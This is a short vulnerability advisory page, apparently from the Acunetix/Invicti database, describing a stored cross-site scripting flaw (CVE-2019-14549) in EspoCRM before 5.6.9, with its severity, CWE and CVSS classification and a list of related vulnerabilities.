Acunetix DAST powers runtime capabilities for Invicti’s complete AppSec platform. Visit Invicti for more.

WEB APPLICATION VULNERABILITIES Standard & Premium

EspoCRM Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability (CVE-2019-14549)

Description

An issue was discovered in EspoCRM before 5.6.9. Stored XSS was executed inside the title and breadcrumb of a newly formed entity available to all the users. A malicious user can inject JavaScript in these values of an entity, thus stealing user cookies when someone visits the publicly accessible link.

Remediation

References

Related Vulnerabilities

MySQL CVE-2012-3197 Vulnerability (CVE-2012-3197)

Liferay DXP Insecure Default Initialization of Resource Vulnerability (CVE-2024-25610)

WordPress Plugin Fancy Cats Multiple Cross-Site Scripting Vulnerabilities (1.1)

Jboss EAP Improper Restriction of XML External Entity Reference Vulnerability (CVE-2017-7464)

Artifactory Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability (CVE-2024-2247)

Severity

Medium

Classification

CVE-2019-14549 CWE-707 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Tags

Missing Update Known Vulnerabilities